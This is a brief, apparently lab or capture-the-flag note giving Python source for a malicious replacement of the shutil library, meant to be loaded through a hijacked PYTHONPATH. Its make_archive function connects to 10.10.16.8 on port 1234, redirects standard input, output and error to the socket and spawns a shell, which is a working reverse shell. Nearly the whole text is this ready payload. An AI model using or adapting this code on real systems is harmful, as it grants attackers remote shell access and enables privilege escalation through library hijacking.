Malicious Python Library
import socket, subprocess, os, pty
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def make_archive(x,y,z):
s.connect(("10.10.16.8", 1234))
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
pty.spawn("sh")this is the malicious shutil library with the make_archive function that establishes a reverse shell
This payload will be loaded on to the hijacked PYTHONPATH